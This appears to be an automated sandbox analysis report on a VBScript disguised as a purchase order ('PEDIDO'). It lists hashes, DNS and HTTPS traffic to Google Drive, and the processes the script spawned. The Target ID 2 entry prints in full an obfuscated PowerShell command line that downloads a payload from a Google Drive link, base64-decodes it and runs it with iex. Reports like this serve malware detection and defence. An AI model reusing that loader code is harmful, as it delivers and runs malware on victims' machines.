                                SSDEEP:24:hazspfXlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pf1mRq+fjsueFYaWJ
                                MD5:C33BC1D2DC44F479F45A6CB99F0899B8
                                SHA1:6F50DD20E73B4B7BBF120D4265F6207AD423ECA6
                                SHA-256:81D6A870EB4E01CA88FA7B8EEE9913CCABB307C731AFE6F166E375E0F6CF4FF3
                                SHA-512:366D7F7AD2B924F45E71D0058F34ABE11668C5207B060C590EDE7D8F3E8D94958A2A101B01FB55788D28C207E7D1C85927CBA19D825FD4CD1CC65FEB32AEF572
                                Malicious:false
                                Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="EaP2ND_woY6bCFVL7AOQhw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):4.862104479443822
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
                                File size:539'501 bytes
                                MD5:7b8f65c95deba3838f09c3c5e8f06c0c
                                SHA1:23f1d2f39788402c16ba1f5d6932eb4bef6df983
                                SHA256:da852e6aeab8c6422eecc57d741aae2a49abd26ee2d29185c0fa8f898f4bdf71
                                SHA512:dd47543459445da9edbb596e987472eac6408159af6ddd55b174896cd6fb3b90f1ba8229d26ca7ebd6fff46b27a6ed7bfa1fc19d805e8c9bd7c0131a7bcf39ba
                                SSDEEP:6144:RV/75X5P9mqNDV7MbA9hftqVDrITVFWCTf90ieURGrMDI1xFz0zhdwu07QBmU1oI:9L/NhVQRI5FL9fTRMzKwuk41omig
                                TLSH:65B43BB2D96806968E4B279AFCA49AC1C6BCC1054B2720F6FFD9474D500B4ECE3FD619
                                File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla
                                Icon Hash:68d69b8f86ab9a86
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 23, 2024 18:43:11.634038925 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:11.634088993 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:11.634167910 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:11.660900116 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:11.660922050 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.524125099 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.524288893 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:12.525233030 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.525294065 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:12.528904915 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:12.528915882 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.529223919 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.541387081 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:12.587332964 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.905246019 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.952677011 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:12.952707052 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:12.999562979 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:13.005120039 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:13.005229950 CEST44349704142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:13.005296946 CEST49704443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:17.879332066 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:17.879379988 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:17.879451990 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:17.879734039 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:17.879750013 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:18.727818012 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:18.727931023 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:18.728523016 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:18.728694916 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:18.730186939 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:18.730201006 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:18.730443954 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:18.731571913 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:18.779333115 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:19.090812922 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:19.091459990 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:19.091526031 CEST44349705142.250.185.206192.168.2.8
                                Oct 23, 2024 18:43:19.091595888 CEST49705443192.168.2.8142.250.185.206
                                Oct 23, 2024 18:43:19.092257977 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:19.092293978 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:19.092389107 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:19.092827082 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:19.092840910 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:19.964831114 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:19.964946985 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:19.967866898 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:19.967874050 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:19.968302011 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:19.969449997 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:20.011343956 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:20.732491016 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:20.732626915 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:20.732691050 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:20.732719898 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:20.734200954 CEST49706443192.168.2.8142.250.185.65
                                Oct 23, 2024 18:43:20.734291077 CEST44349706142.250.185.65192.168.2.8
                                Oct 23, 2024 18:43:20.734354973 CEST49706443192.168.2.8142.250.185.65
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 23, 2024 18:43:11.621501923 CEST5653953192.168.2.81.1.1.1
                                Oct 23, 2024 18:43:11.628875017 CEST53565391.1.1.1192.168.2.8
                                Oct 23, 2024 18:43:13.006949902 CEST5355153192.168.2.81.1.1.1
                                Oct 23, 2024 18:43:13.015732050 CEST53535511.1.1.1192.168.2.8
                                Oct 23, 2024 18:43:49.741609097 CEST5352505162.159.36.2192.168.2.8
                                Oct 23, 2024 18:43:50.369827032 CEST53521191.1.1.1192.168.2.8
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 23, 2024 18:43:11.621501923 CEST192.168.2.81.1.1.10x2b8eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                Oct 23, 2024 18:43:13.006949902 CEST192.168.2.81.1.1.10x5fbeStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 23, 2024 18:43:11.628875017 CEST1.1.1.1192.168.2.80x2b8eNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                Oct 23, 2024 18:43:13.015732050 CEST1.1.1.1192.168.2.80x5fbeNo error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                • drive.google.com
                                • drive.usercontent.google.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849704142.250.185.206443432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-23 16:43:12 UTC215OUTGET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-10-23 16:43:12 UTC1610INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 23 Oct 2024 16:43:12 GMT
                                Location: https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download
                                Strict-Transport-Security: max-age=31536000
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Opener-Policy: same-origin
                                Content-Security-Policy: script-src 'nonce-S9QeWr6PlJ2IbCTAuixtbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849705142.250.185.206443432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-23 16:43:18 UTC121OUTGET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-10-23 16:43:19 UTC1319INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 23 Oct 2024 16:43:18 GMT
                                Location: https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: script-src 'report-sample' 'nonce-LoMwXHGUymgPazWlGFTkYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Opener-Policy: same-origin
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.849706142.250.185.65443432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-23 16:43:19 UTC139OUTGET /download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download HTTP/1.1
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-10-23 16:43:20 UTC1904INHTTP/1.1 200 OK
                                Content-Type: text/html; charset=utf-8
                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 23 Oct 2024 16:43:20 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Content-Security-Policy: script-src 'report-sample' 'nonce-y6f35rXfQbOcZZhcbj6EUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Resource-Policy: same-site
                                Cross-Origin-Opener-Policy: same-origin
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmII1pBicEqfwRoCxKt_nmNdD8R7Np1nPQDEf2QusTLIXmIV4uFYcf7JDjaBCX0z2pmUVJPyC-NTijLLUjNKSgoSCzKLU4vKUovijQyMTAwNDA30DIziCwwAlGMiqg"
                                Content-Length: 1692
                                X-GUploader-UploadID: AHmUCY2nxGuKPAHi96lPJ4rpD78Isaz7f4U4WPa-1pfGEUDFH9dU3Drp8yfkg-LyH66shzY7fhxK9Blh6A
                                Server: UploadServer
                                Set-Cookie: NID=518=kt_vQ0dFlOnPfp8OGQ_flcDyX5J4NC16eRCysWDC_PcRA2k1tClocmJV9Ra11jOlPKrG05hj2YTaL4MTct5JL52KZAY-4oCz62VQBzPt9JVeG35wAcZA12Kzd-0_AHqJwIDzSjW1TdffjBrQVIzM79xtwUYARRYmDhcbeW6Ko6pWXRPi3Ts; expires=Thu, 24-Apr-2025 16:43:20 GMT; path=/; domain=.google.com; HttpOnly
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
                                2024-10-23 16:43:20 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 61 50 32 4e 44 5f 77 6f 59 36 62 43 46 56 4c 37 41 4f 51 68 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="EaP2ND_woY6bCFVL7AOQhw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:12:43:05
                                Start date:23/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
                                Imagebase:0x7ff6e0050000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:12:43:08
                                Start date:23/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11 'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl ');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[ Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e ';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous (Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11 'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne- Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous (Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC ,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') ;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous (Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola 1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous (Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous (Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo =Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto ');Semicalcareous $Antegningerne;"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:12:43:08
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >
                                  Memory Dump Source
